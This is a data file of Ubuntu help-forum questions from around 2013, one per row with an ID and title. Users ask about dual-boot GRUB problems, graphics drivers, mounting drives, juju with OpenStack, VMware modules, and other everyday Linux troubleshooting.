ubuntu 13.04 come with an easier way to install raid0 , or better yet accommodate fakeraid by allowing the installation to install grub in the first place ?
334013	intsalling ubuntu on toshiba w/ amd radeon hd 7520g	i 've installed ubuntu on my desktop and previous laptop . but now i want to get a new laptop : toshiba satellite c855d-s5116 . it has amd a6-series processor and graphics : amd radeon hd 7520g i ca n't find anything online saying that the radeon hd7520g will support ubuntu . if anyone can point me to something that will tell me if this laptop will run ubuntu it would be awesome . thanks .
334017	ubuntu wo n't load gui	i just bought a toshiba l75d-a7283 laptop . it has an amd radeon hd8330 graphics card in it . windows 8 is awful , so i figured i would give linux a try before installing windows 7 . i 'm clueless when it comes to linux , so anybody know why on this laptop it wo n't load the gui but stays at the command line ? also it would n't load the gui off the cd when selecting try ubuntu before installing .
334019	amd a10-5700 work out of the box ?	if the cpu , amd a-series a10-5700 quad-core processor with amd radeon hd 7660d , that is the internal graphics card radeon hd 7660 , from ubuntu 12.04 ( 64-bit ) out of the box work ?
334022	mount error , special device does not exists	i have a hard disk of 320 gb on ubuntu 12.04 64-bit . 2 drives of my hard ( sda7 and sda8 of ext3 type ) can not be mounted . output of sudo mount /dev/sda7 /home/newfolder -t ext3 : mount : special device /dev/sda7 does not exists ! /dev/ contains the following : sda sda1 sda5 sda6 but gparted shows sda7 and sda8 : output of blkid : /dev/sda1 : uuid= '' a898f3ad-11d9-4dbb-9ea8-71a819dc8f70 '' type= '' ext4 '' /dev/sda5 : uuid= '' 998c7c6f-5ff8-426c-83d4-1a309b7cdc4f '' type= '' swap '' /dev/sda6 : uuid= '' da0460d0-714e-40ae-b88b-a0deca87087c '' type= '' ext4 '' /dev/sdb1 : label= '' flash drive '' uuid= '' 8a24-b5cd '' type= '' vfat '' output of fdisk -l : disk /dev/sda : 320.1 gb , 320071851520 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625140335 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x17ea17ea device boot start end blocks id system /dev/sda1 * 2048 194559 96256 83 linux /dev/sda2 196607 625121279 312462336+ f w95 ext 'd ( lba ) /dev/sda5 196608 8007679 3905536 82 linux swap / solaris /dev/sda6 8009728 61431807 26711040 83 linux /dev/sda7 61432623 337911209 138239293+ 83 linux /dev/sda8 337911273 625121279 143605003+ 83 linux output of cat /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda8 during installation uuid=da0460d0-714e-40ae-b88b-a0deca87087c / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=a898f3ad-11d9-4dbb-9ea8-71a819dc8f70 /boot ext4 defaults 0 2 # swap was on /dev/sda7 during installation uuid=998c7c6f-5ff8-426c-83d4-1a309b7cdc4f none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 output of ls /dev/mapper : control
334032	dual boot windows 8 and ubuntu ideapad y400	before this , i always dual boot ubuntu alongside with windows . im also helping my friend to do it . but my old laptop dell latitude d635 had been replaced with lenovo ideapad y400 . below is the spec : y400 , i7-3630qm + nvidia gt750m , 4gb , 500gb , w8 , 120wpsu , swappable odd the windows preinstalled is in uefi mode . so , i try to install it the normal way i installed ubuntu . when boot from usb , i have two options . efi kingston or kingston . so i choose efi kingston as i know that time my windows in uefi mode . but after done installing , i reboot and it went to windows ... it didnt show usual grub menu , but automatically go to windows , like i didnt install ubuntu . by default secure boot is disable . so what should i do so i can dual boot it with my win8 ? hope pro here can help me . or is there any y400 user here ? i preferred 12.04 though as it support till 2017 . no need to upgrae everytime .
334040	script at /etc/init.d does not run at start-up	i wanted to run my dropbox daemon automatically at start-up . i did it via terminal , that is , i ( 1 ) moved it to /etc/init.d , ( 2 ) made it executable , and ( 3 ) ran sudo update-rc.d dropbox.sh defaults . so we have $ ll /etc/init.d/dropbox.sh -rwxr-xr-x 1 root root 38 aug 16 00:18 /etc/init.d/dropbox.sh* $ cat /etc/init.d/dropbox.sh # ! /bin/sh ~/.dropbox-dist/dropboxd & $ ll ~/.dropbox-dist/dropboxd -rwxr-xr-x 1 skrd skrd 258 jun 6 03:03 /home/skrd/.dropbox-dist/dropboxd however , dropbox does not run upon start up . note that , invoking /etc/init.d/dropbox.sh runs the dropbox daemon without hitch . i know that ubuntu has a gui for this and i could easily just add the dropbox script there but i wonder why my terminal commands did n't do it ? is n't that more standard for linux machines ?
334045	how to uninstall windows and install ubuntu instead ?	i want to uninstall windows and install ubuntu on my laptop . for now i have windows 7 professional and the version of ubuntu that i want is ubuntu 13.04 . my question is : what should i do to uninstall windows 7 and install ubuntu 13.04 on my laptop ? thanks .
334047	gnome display manager	my gdm login screen is look like this : not like : how to make it took like the second image ?
334050	a problem with a strange flickering/undulating effect and a related question about drivers on ubuntu	i have been having a very frustrating problem in ubuntu . sometimes , there is a graphical effect that can only be described as flickering or undulation . i think undulation is the most accurate one , since that is really what it looks like , like the bottom of a pool of clear water . it used to happen on windows as well , when i was doing graphically intensive things , but it started appearing on ubuntu even when i was just browsing the internet . i thought it might be a problem with drivers , so i tried to find proper drivers on ubuntu . well , this is where i got completely stuck . the proprietary drivers that apparently work the best turned out to not work for my graphics card ( since it is an older card ) . my card is an ati radeon hd 4670 . i have several questions . 1 ) i did everything i could to find working drivers for my card on my os ( ubuntu 13.04 ) but i did not find anything . what is the best driver i could get , and where could i get it ? people have suggested several open source drivers already but i 'm not sure which to install , and which are the best . 2 ) i downgraded my xserver in an attempt to install a proprietary driver , and i could not do it . as embarrassing as it is , now i do not know how to upgrade my xserver again . when looking for xserver upgrades , i ultimately found four packages . i did not know which one was which , so i just left it downgraded . thanks !
334051	ca n't play vcd and dvd in ubuntu release 12.04 ( precise ) 64-bit	i have tried playing vcds and dvds but i always get this type of error : file reading failed : vlc could not read the file ( input/output error ) .
334055	i am trying to install package fetch	dam @ ubuntu : ~ $ sudo apt-get update w : failed ... . adam @ ubuntu : ~ $ sudo apt-get install fetch reading package lists ... done building dependency tree reading state information ... done e : unable to locate package fetch
334057	gnome-tweak tool does n't work	i decided to give the gnome desktop a shot , so , i installed gnome-shell , and later i wanted to tweak things around a bit , to suit my preferences , for which i downloaded the gnome-tweak tool . now , the gnome-tweak tool is supposed to show up in the menu as advanced setting , which it does , however , upon clicking it , i have the icon of advanced settings on the top left corner of my window , and along with that , an icon to indicate that it is loading . that 's where it ends , the icon just disappears from the top menu , and the advanced settings app never opens . how can this issue be solved ? edit # 1 upon running the gnome-weak-tool command from the terminal i get the following error : traceback ( most recent call last ) : file `` /usr/bin/gnome-tweak-tool '' , line 22 , in < module > import gi importerror : no module named gi
334066	i can not install wine -1.6	i am using tar file . i am extracting using tar xvjf filename then i am doing ./configure and getting error to install package fetch . now what to do ?
334069	error while installing ubuntu	i have downloaded ubuntu 12.04 for windows laptop laptop and successfully burned into dvd and while installing the dvd iam getting this error : '' kernel ca n't load and also error in cd '' i have followed normal procedure to burn the dvd .
334070	only 8 days into ubuntu , and i did some damage	in order to eliminate some of the permissions obstacles i keep finding , i decided to make it easier on myself . i did $ sudo chmod 755 -r /usr if i knew 10 hours ago what i 've learned in researching this , i would n't have used that command . i tried this first $ chmod 755 -r /usr that resulted an a large number of these : $ chmod : changing permissions of â/usr/dir/fileâ : operation not permitted i tried another sudo command , and that one returns : effective uid is not 0 , is sudo installed setuid root ? is there a way to reverse this without a clean reinstall ? all i 've done for the last 8 or 9 days is to read , configure software , and try to learn how to use the terminal , and i do n't exactly look forward to starting that process again , even if not quite back to the beginning .
334073	no grub direct booting to windows	i have lenovo laptop . i installed first windows 7 on a 60 gb partition . also i had an empty 400 gb partition with ntfs formatting . in the remaining disk space i installed ubuntu 13.04 gnome edition and a 2 gb swap-partition . after installing ubuntu i restarted and instead of showing any grub menu it directly boots to windows 7 . i tried to boot from the live cd and checked that the ubuntu is already installed . i tried the chroot command to access the installed ubuntu from the live cd and tried install-grub and update-grub . they worked fine . the update-grub command showed all the three entries for win 7 and rest two for ubuntu . but when i restarted nothing showed up and i booted directly to windows 7 . please help me to get grub menu . i 've tried re-installing ubuntu but it did n't help .
334078	how to get same portuguese keyboard as ubuntu in xubuntu	i have installed xubuntu 13.04 but am finding that the portuguese keyboard layout is not the same as the portuguese layout i had in ubuntu 12.04 lts . i am using the uk microsoft curve 2000 . when i press they keyboard 's 'e ' key a ' . ' appears instead . the workaround has been to use the 'portuguese ( macintosh , sun dead keys ) ' portuguese layout which is close but i have to stretch my fingers to the ' ] ' key instead of the ' [ ' key to get the accents , and i do n't want to have to retrain my muscle memory for something that is likely to change . would remapping keys be the most viable solution or is there just something i need to install or download ?
334080	adminstrators access to home directories in ubuntu	on a shared desktop pc running ubuntu 12.10 , there are multiple users with full administrator rights . can one administrator see the content of other administrator 's account ?
334081	youtube-dl multiple files downloading	i use youtube-dl to download files from youtube . i have tried downloading multiple files , but it is not working out for me . i have to open multiple terminals and start afresh every time i want to download a video . can you help me to download multiple files with a single terminal window by just mentioning all the urls at once ? i use ubuntu 12.04 64-bit .
334085	online accounts not working , ca n't create one	i am using ubuntu 13.04 . i am trying to setup online accounts , i.e . google+ . i click on google and the login window for google+ then shows up . however after a few seconds it reverts to the add account window . how do i fix this ?
334086	ntfs drive write access denied	in ubuntu i tried to play with the permission of ntfs drive . i installed an app from the ubuntu software center named ntfs configuration tool . after using it a few times , the app started to close and was n't responding . so i removed the app . the next day i opened my pc , started the torrent client transmission . that was a huge file so i downloaded that to my ntfs drive . so i resumed the torrent , but it said permission denied to write . : ( it seems like all of my ntfs drives have become read-only . i ca n't write anything . how can i fix this permanently ? ( i 've run transmission using sudo command . it 's working , but using sudo command everywhere is n't the solution , i need it back like it was before . please help . ) here are my fstab contents :
334087	configure juju with openstack using keystone	i am trying to integrate juju with openstack . i have a virtual machine and on that i have installed openstack grizzly using devstack script . now i want to configure juju with openstack ( want to configure using keystone , not swift ) , so that i can create openstack instances using juju . here is my environment.yaml , root @ ubuntutcs : ~/.juju # cat environments.yaml environments : openstack : type : openstack control-bucket : juju-openstack-myproject-95ec-8c2083e67721 admin-secret : foooooooo auth-mode : userpass auth-url : http : //myhost:5000/v2.0/ username : demo password : openstack project-name : demo default-series : precise default-instance-type : m1.small default-image-id : 60eb0af4-03f9-4d35-a858-3da302380937 s3-uri : http : //myhost:3333 combined-key : 095b11767c084842b34e14ce2646b67e secret-key : fce90f6069fd4ab4bce4f4b28be49e26 root @ ubuntutcs : ~/.juju # and i am getting following error , root @ ubuntutcs : ~/.juju # root @ ubuntutcs : ~/.juju # juju bootstrap -v -- debug 2013-08-18 07:04:01 info juju provider.go:115 environs/openstack : opening environment `` openstack '' 2013-08-18 07:04:01 warning juju config.go:133 config attribute `` default-image-id '' ( 60eb0af4-03f9-4d35-a858-3da302380937 ) is deprecated and ignored , use simplestreams metadata instead 2013-08-18 07:04:01 warning juju config.go:138 config attribute `` default-instance-type '' ( m1.small ) is deprecated and ignored 2013-08-18 07:04:01 warning juju.environs.config config.go:429 unknown config field `` project-name '' 2013-08-18 07:04:01 warning juju.environs.config config.go:429 unknown config field `` s3-uri '' 2013-08-18 07:04:01 warning juju.environs.config config.go:429 unknown config field `` combined-key '' 2013-08-18 07:04:01 error juju supercommand.go:235 command failed : required environment variable not set for credentials attribute : tenantname error : required environment variable not set for credentials attribute : tenantname root @ ubuntutcs : ~/.juju # please help me to understand the error .
334092	incoming ssh connections blocked	hi some time back i asked this question and made a lot of changes to secure my system . now i need to make a dummy account and give ssh access of this account to a friend . but i am unable to receive any incoming ssh connections . i can ssh to any server via my computer but can not ssh to even localhost . i am sure its due to some settings i changed in a bid to make my system more secure but know i do n't remember those changes . for one , i have disabled ufw . also there is nothing blocking any user in /etc/ssh/sshd_config or in /etc/hosts.allow or /etc/hosts.deny . i have attached the output of ssh -v localhost here . i narrowed down the problem to debug1 : ssh2_msg_service_accept received by comparing my output with this output on a friend 's computer . edit 1 : this is the output on using ssh -vvvvvv localhost any help is appreciated .
334093	how do i select which os to boot with no keyboard on a laptop ? can i adjust grub loader settings from the booted ubuntu os ?	well , the title says it all , basically . i am dual booting windows 7 and ubuntu 13.04 on my laptop , that has no keyboard . i am wondering how i would go about switching to windows 7 ( ubuntu is the first option , and automatically boots after the countdown is done ) if i ca n't use the up/down arrows . thanks .
334096	firefox can not save adobe flash player settings	when i visit a flash based site the flash player tab pop-ups , as usual . everyone knows that is not working ( under unity ) , so i tried to set things on adobe 's site . the only problem is that the flash can not save my settings . i tried to edit things , blocking/denying sites , increase/decrease/delete cache , but it did not make the change . it looks like i have no permission to edit these settings or something like that . but it worked before . everything is up-to-date ( flash version : 11.2.202.297 ) . how can i find out the reason or edit manually these settings ? update : i tested it with opera too and the result is the same , so both browsers can not save these settings .
334098	unable to see the ui while using usb modem	i successfully installed ubuntu 13.04 on my system . however , when i tried installing my usb modem of the type zte ac2787 , i found that the file explorer could n't detect the modem . additionally , i could n't see the ui popping up just like it does in windows . i checked this website http : //ubuntuforums.org/showthread.php ? t=2110075 and i tried to look for my modem type in the rules , but i did n't find an entry corresponding to it . i need the ui to check how much data i am consuming . is there any way to fix this ? secondly , after i installed ubuntu on a separate partition i checked for it on windows , but the drive i installed it on , merely showed it to be an unformatted drive . now , i remember doing two things . one , while installing , i chose /dev/sda5 as the device to install it on , and then i encrypted my drive . is this happening because of that ? also , the boot manager still does n't seem to have a record of ubuntu because every time i want to boot ubuntu , i have to press f9 at startup and boot it manually . is there something i can do here ? as i said before , i am new to ubuntu , and i am still finding my way to do things . any help would be appreciated . thanks in advance .
334103	php files are not running after installation of apache2	i am new to ubuntu 11.10 . so please help me . i had lampp instlled in /opt directory and i tried to install apache2 for running cgi scripts . apache2 installed properly and i am able to run cgi scripts ( saving scripts in /var/www directory ) but then i am not able to run php nor have access to phpmyadmin . so i tried re-installing xampp but it shows me not installed error message after uninstalling it . what to do ? and also other application files are also not opening . it shows me a message whether to display or to run in terminal . what kind of problem is this ?
334109	how can i remove ubuntu from my computer ?	i installed it but all my files have been lost . i had windows 7 before that . how do i remove ubuntu from my computer ? how do i recover my files ?
334110	vmware player installation failed building kernel module 3.11	i 'm trying to install vmware player under ubuntu 13.04 and my kernel is 3.11.0.2-generic . the vmware install failed because it could n't build kernel module : the log is : ago 18 09:27:20.737 : app| log for vmware workstation pid=9313 version=6.5.5 build=build-328052 option=release ago 18 09:27:20.737 : app| host codepage=utf-8 encoding=utf-8 ago 18 09:27:20.737 : app| logging to /tmp/vmware-root/setup-9313.log ago 18 09:27:23.829 : app| extracting the sources of the vmmon module . ago 18 09:27:23.849 : app| building module with command : /usr/bin/make -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.11.0-2-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.8 how can i solve it ? edit : here is the requested output of dpkg -l | grep -e 'linux-headers|gcc|build-essential : ii build-essential 11.6ubuntu5 i386 informational list of build-essential packages ii gcc 4:4.8.1-2ubuntu2 i386 gnu c compiler ii gcc-4.4 4.4.7-2ubuntu2 i386 gnu c compiler ii gcc-4.4-base : i386 4.4.7-2ubuntu2 i386 gcc , the gnu compiler collection ( base package ) ii gcc-4.8 4.8.1-8ubuntu1 i386 gnu c compiler ii gcc-4.8-base : i386 4.8.1-8ubuntu1 i386 gcc , the gnu compiler collection ( base package ) ii gccxml 0.9.0+git20130511-1ubuntu1 i386 xml output extension to gcc ii libgcc-4.8-dev : i386 4.8.1-8ubuntu1 i386 gcc support library ( development files ) ii libgcc1 : i386 1:4.8.1-8ubuntu1 i386 gcc support library ii linux-headers-3.10.0-4 3.10.0-4.13 all header files related to linux kernel version 3.10.0 ii linux-headers-3.10.0-4-generic 3.10.0-4.13 i386 linux kernel headers for version 3.10.0 on 32 bit x86 smp ii linux-headers-3.11.0-2 3.11.0-2.5 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-2-generic 3.11.0-2.5 i386 linux kernel headers for version 3.11.0 on 32 bit x86 smp ii linux-headers-generic 3.11.0.2.3 i386 generic linux kernel headers thanks again .
334112	why does n't rtorrent support all types of torrent file ?	when i tried to download a torrent file using rtorrent it showed : bash : syntax error near unexpected token ` ( ' it happens only for some files , not for all . why does it happen for some torrent files ?
334120	ubuntu 13 and installation	i was trying to give a shot to ubuntu instead of windows . but i dont want to completely remove windows . what i have done downloaded latest ubuntu 13 image file ( .iso ) created a new partition ( i want to install on it ) first i thought that i can use a blank cd to write the files to make it bootable , but i realised that the size is more than 700mb and need to use dvd so i dont have cd or usb , i used unetbootin to install ubuntu ( infact i cant see all my harddrives listed only c is available , then i choosed c ) i formatted the new partition and installed it on ( actually i thought that the installer is user friendly , but in fact its really hard when we compared to windows ) i installed everything and it displayed , everything is ok , please restart to start using ubuntu . i restarted , but i couldnt see the boot option there and there is only two items 1 ) windows 7 , 2 ) unetbootin do i need to do something more to get it work ? please help me . updates i said i cant see all harddrive listed , its not in the ubuntu installer and its in unetbootin window . ( i have c , d , e ( new one for ubuntu ) ) but unetbootin only showed c. i removed unetbootin from windows and now i cant see the second option in booting ( only windows 7 is listed and its automatically loading win7 )
334121	can i create partitions and encrypt a couple of them for ubuntu 12.04.2 installation ? ? ?	i am trying to install ubuntu 12.04.2 . i have onboard raid with 2 identical solid state drives bought at the same time and that 's ok , because ubuntu recognizes them as one disk . however , i want to partition the installation and encrypt the 'swap space ' , the 'var ' log , and i 'd like to encrypt the underlying disk if it 's at all possible , all so that disasters are easily recoverabe and secure at the same time . i use a couple of 64 gigabyte thumbdrives for data storage whose underlying filesystem i would like to encrypt the as well . kind of like my own version of a secure computer with secure cloud storage . has anybody done this or knows if it is possible at all ? reading through as much as the community documentation as i could on this , it seems i am going to have to use truecrypt for the encryption part after the installation is done , because could not see any ubuntu level tools that can actually do this . anybody have any ideas or know of any guides out there that can guide me ?
334136	how do i install build-essential without an internet connection ?	i ca n't install it . qhen i am installing build-essential_11.4build1_amd64.deb getting error of wrong architecture still i am using amd turion 64 and then i am trying to install build-essential_11.4build1_i386.deb getting error of dependency is not satisfiable : g++ ( > =4:4.3.1 ) i do n't have an internet connection in ubuntu that 's why i have downloaded from windows so what to do now ?
334137	how do i reset screen resolution back to 1366x768 ?	actually in the beginning it was working fine at 1366x768 . but then one day my computer hanged and i had to restart . since then i 'm stuck at 1024x768 with no other resolution options . i have read answers of many relevant questions but none of the suggestions work . i tried adding new modes through : cvt , xrandr modified xorg.conf by adding modes `` 1366x768 '' and similar suggestions but none have worked . any help would be appreciated ?
334138	ubuntu 13.04 installation with usb - black screen on boot	i have downloaded the ubuntu 13.04 iso and i wrote it on a usb flash using usb startup disk creator . i reboot my laptop , went to the bios and i chose to boot my laptop from the usb and i saved the changes . after that a black screen appeared . i do n't know what to do . please tell me what to do to make it work . also , when i connect my usb on ubuntu , ubuntu does n't show my usb drive on the desktop and does not even acknowledge it . i really want to install ubuntu 13.04 on my laptop because i am running ubuntu 9.04 and it has many problems .
334141	how to unmount windows partition disk permantely	i have dual os ( windows 8 and ubuntu ) , when i using ubuntu , windows partition disks are automatically mounted in explorer . i need to unmount permanently on every boot or permanently . i tried this in gparted but when reboot it again mounted . kindly share your views .
334144	resuming from hibernate give error : failed to resume : error -19	i am on ubuntu 13.04 ( updated ) , acer aspire v5 . whenever i wake from hibernate i get error failed to resume : error -19 . below is an extract of dmesg [ 11650.028842 ] pm : early resume of devices complete after 0.103 msecs [ 11650.030134 ] dpm_run_callback ( ) : pnp_bus_resume+0x0/0x80 returns -19 [ 11650.030135 ] pm : device 00:07 failed to resume : error -19 [ 11652.328294 ] pm : resume of devices complete after 2300.176 msecs [ 12701.155886 ] acpi : low-level resume complete [ 12701.686424 ] pm : noirq resume of devices complete after 159.993 msecs [ 12701.686554 ] pm : early resume of devices complete after 0.103 msecs [ 12701.687910 ] dpm_run_callback ( ) : pnp_bus_resume+0x0/0x80 returns -19 [ 12701.687911 ] pm : device 00:07 failed to resume : error -19 [ 12703.989004 ] pm : resume of devices complete after 2303.176 msecs help ?
334147	ext4 filesystem seems to have disappeared	i previously had an lvm consisting of a few different drives , including two 4tb seagate usb 's . i migrated my data off the drives . copy - > shrink - > copy - > shrink once the drive was removed i formatted it to ext4 and put some data back on it . i did this to about 7 drives . 4 internal and 3 usb externals . one of the seagate externals was full from a copy - > shrink . meaning i formatted it , mounted it , and put around 3.5tb of data on it . the other 4tb drive should be empty . the data was there and read/writeable . on a possibly unrelated note i had got greyhole working and was attempting to mount a samba share locally . i had to restart . so i shutdown and came back to the project a week later ( it 's been off the entire time ) i tired mounting one of the 4tb externals . ~ $ sudo mount /dev/sdg external mount : you must specify the filesystem type i then run parted : ~ $ sudo parted -l ... model : seagate backup+ desk ( scsi ) disk /dev/sdg : 4001gb sector size ( logical/physical ) : 4096b/4096b partition table : gpt number start end size file system name flags 1 24.6kb 4001gb 4001gb primary model : seagate backup+ desk ( scsi ) disk /dev/sdh : 4001gb sector size ( logical/physical ) : 4096b/4096b partition table : gpt number start end size file system name flags 1 24.6kb 4001gb 4001gb primary the complete output can be seen here : pastebin so as you can see the filesystem tags are now empty . while the other internal drives are fine and a wd passport usb drive is fine too . i tried mounting the drive again using this tutorial on dirty ext4 's : how to mount dirty ext4 file systems but this just gave me similar errors to normal mounting . : ~ $ sudo mount -o loop , ro , noexec , noload /dev/sdh external mount : you must specify the filesystem type : ~ $ sudo mount -t ext4 -o loop , ro , noexec , noload /dev/sdh external mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so : ~ $ dmesg | tail -l [ 1938.343779 ] ext3-fs ( loop0 ) : error : ca n't find ext3 filesystem on dev loop0 . [ 1938.343875 ] ext4-fs ( loop0 ) : vfs : ca n't find ext4 filesystem [ 1938.344016 ] fat-fs ( loop0 ) : unrecognized mount option `` noload '' or missing value [ 1942.733970 ] ext4-fs ( loop0 ) : vfs : ca n't find ext4 filesystem thank you all for your time . edit : after running fsck : fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdg the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device >
334149	ubuntu 12.04 and mono runtime issue	i am running a .net4 app from my usb disc with mono and runs fine . i copy the complete app folder to the harddrive ( desktop ) and start my app with mono and get an error the some isnot found ... i do not see the problem since it runs fine from my usb drive . and i am sure all files are copied , all in one directory ) the full text of the error is : unhandled exception : system.invalidoperationexception : winforms_seeinnerexception -- - > system.io.filenotfoundexception : could not load file or assembly 'mysql.data , version=6.7.4.0 , culture=neutral , publickeytoken=c5687fc88969c44d ' or one of its dependencies . file name : 'mysql.data , version=6.7.4.0 , culture=neutral , publickeytoken=c5687fc88969c44d' at system.windows.forms.toolstripitem.ontextchanged ( system.eventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.forms.toolstripitem.set_text ( system.string value ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.frmmain.initializecomponent ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) redesigned_integration_platform.frmmain : initializecomponent ( ) at redesigned_integration_platform.frmmain..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at redesigned_integration_platform.my.myproject+myforms.create__instance__ [ frmmain ] ( redesigned_integration_platform.frmmain instance ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myproject+myforms.get_frmmain ( ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myapplication.oncreatemainform ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.onrun ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.run ( system.string [ ] commandline ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myapplication.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 [ error ] fatal unhandled exception : system.invalidoperationexception : winforms_seeinnerexception -- - > system.io.filenotfoundexception : could not load file or assembly 'mysql.data , version=6.7.4.0 , culture=neutral , publickeytoken=c5687fc88969c44d ' or one of its dependencies . file name : 'mysql.data , version=6.7.4.0 , culture=neutral , publickeytoken=c5687fc88969c44d' at system.windows.forms.toolstripitem.ontextchanged ( system.eventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.forms.toolstripitem.set_text ( system.string value ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.frmmain.initializecomponent ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) redesigned_integration_platform.frmmain : initializecomponent ( ) at redesigned_integration_platform.frmmain..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at redesigned_integration_platform.my.myproject+myforms.create__instance__ [ frmmain ] ( redesigned_integration_platform.frmmain instance ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myproject+myforms.get_frmmain ( ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myapplication.oncreatemainform ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.onrun ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.run ( system.string [ ] commandline ) [ 0x00000 ] in < filename unknown > :0 at redesigned_integration_platform.my.myapplication.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0
334151	unity not showing applications	i have a weird issue with unity , it just stopped showing applications in the unity dash search menu . i ca n't launch application unless i run them from the terminal . i have tried to force unity re-installation with no success , and i could not find any other information regarding to this issue . prior to full re-installation ( i prefer not to , since my disk is encrypted ) i am seeking for help . ( i am a developer and would love to help with more information as needed ) . an image to applications is shown like this , when looking at ubuntu dash search feature .
334155	how to turn off unity 3d so i can use unity 2d on ubuntu 13.04	i just want to turn unity 3d off and use unity 2d . i crunch alot of words and numbers , and when i try multitasking , unity 3d is taking system resources that i need .
334158	installing opencv	i 've downloaded opencv but unfortunately i 've got no idea how to install it . all the pages i found online were only telling me how to download and install it directly from the console , not what to do when you already have it downloaded . could anybody tell me what to do ?
334159	ubuntu installation ( multiboot )	i have a windows 7 computer . i want to install ubuntu . i know if i install to the unallocated it will set up the multiboot like it should . however , i want to set the partitions up manually , i want different stuff in different partitions , e.g . logs . if i do this , will the installer still set up the multiboot like it should ?
334162	flash player slows down when i move mouse	whenever i move my mouse , my flash player slows down . it happens only in flash games , not videos ( from what i 've seen so far ) ; and it seems to only happens in firefox , because whenever i use chromium , i have no problem at all . ( it seems that it 's not an add-on problem , because i 've used ff with all add-ons disabled in safe mode , but there 's no difference ) . what it could be ? firefox 23.0+build2-0ubuntu0.13.04.1 chromium-browser 28.0.1500.71-0ubuntu1.13.04.1 flashplugin-installer 11.2.202.297ubuntu0.13.04.1 3.8.0-27-generic # 40-ubuntu smp tue jul 9 00:17:05 utc 2013 x86_64 x86_64 x86_64 gnu/linux about : support > http : //paste.ubuntu.com/6019691/ about : plugins > http : //paste.ubuntu.com/6019692/ about : support ( no extensions but flash ) > http : //paste.ubuntu.com/6019695/ about : plugins ( no plugins but flash ) > http : //paste.ubuntu.com/6019694/ question : if i would n't have hardware acceleration , would n't that mean that i should have the same problem with chromium , or it 's independent of each browser ?
334165	failed to perform dissociation handshake for toe	failed to perform dissociation handshake for toe initialization . toe capabiltity is disabled for embedded nic 2 . i ran updates and this starting coming up on 12.04lts . i cant get either nic to work and i found some ideas on google but they all require ethtool which i dont have installed and have no nic for a connection . i even tried 13.02 usb boot and also did n't see the nics . am i having a hardware failure ?
334168	my power button does n't work under lxde . how can i fix this ?	ever since i switched to lxde my power button wo n't work anymore . i would love to be able to display a fancy logout menu like the one in unity and similar des . how can i achieve this ?
